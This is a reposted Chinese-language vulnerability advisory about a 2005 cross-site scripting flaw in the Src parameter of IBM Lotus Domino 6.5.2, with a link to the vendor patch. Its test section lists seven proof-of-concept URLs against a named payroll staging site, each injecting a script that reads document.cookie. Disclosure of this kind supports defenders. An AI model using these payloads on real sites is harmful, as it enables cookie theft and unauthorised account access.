IBM Lotus Domino Src参数跨站脚本漏洞

发布日期：2005-09-16
更新日期：2005-09-16

受影响系统：

IBM Lotus Domino Enterprise Server 6.5.2
IBM Lotus Domino 6.5.2

描述：

---

BUGTRAQ ID: 14846

Lotus Domino/Notes是集电子邮件、文档 数据库、快速应用开发技术以及Web技术为一体的电子邮件与群件平台。

IBM Lotus Domino中存在跨站脚本漏洞，远程攻击者可能利用此漏洞获取信息。

起因是没有充分的验证通过URI参数提供的数据。攻击者可以通过诱骗用户访问包含有HTML和脚本代码的恶意链接来利用这个漏洞，在Src参数中注入HTML。这可能允许窃取基于cookie的认证凭据，从而获得非授权访问。

<*来源：IBM （ncsupp@ca.ibm.com）

链接：http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg1LO07849&loc=en_US&cs=utf-8&cc=us&la
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

https://www.pwciasservices.com/pwciasservices/Staging/CitiPayPro.nsf/SubPayrollExceptionsFS?OpenFrameSet&Frame=Main&Src=a"></FRAMESET><script>alert(document.cookie)</script>

https://www.pwciasservices.com/pwciasservices/Staging/CitiPayPro.nsf/SubFS?OpenFrameSet&Frame=Main&Src=a"></FRAMESET><script>alert(document.cookie)</script>

https://www.pwciasservices.com/pwciasservices/Staging/CitiPayPro.nsf/SubDocumentExchangeFS?OpenFrameSet&Frame=Main&Src=a"></FRAMESET><script>alert(document.cookie)</script>

https://www.pwciasservices.com/pwciasservices/Staging/CitiPayPro.nsf/SubReportFS?OpenFrameSet&Frame=Main&Src=a"></FRAMESET><script>alert(document.cookie)</script>

https://www.pwciasservices.com/pwciasservices/Staging/CitiPayPro.nsf/SubPaymentProcessingFS?OpenFrameSet&Frame=Main&Src=a"></FRAMESET><script>alert(document.cookie)</script>

https://www.pwciasservices.com/pwciasservices/Staging/CitiPayPro.nsf/SubReportsPPFS2?OpenFrameSet&Frame=SubBottom&Src=a"></FRAMESET><script>alert(document.cookie)</script>

https://www.pwciasservices.com/pwciasservices/Staging/CitiPayPro.nsf/SubReportsPEFS2?OpenFrameSet&Frame=SubBottom&Src=a"></FRAMESET><script>alert(document.cookie)</script>

建议：

---

厂商补丁：

IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg1LO07849&loc=en_US&cs=utf-8&cc=us&lan

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有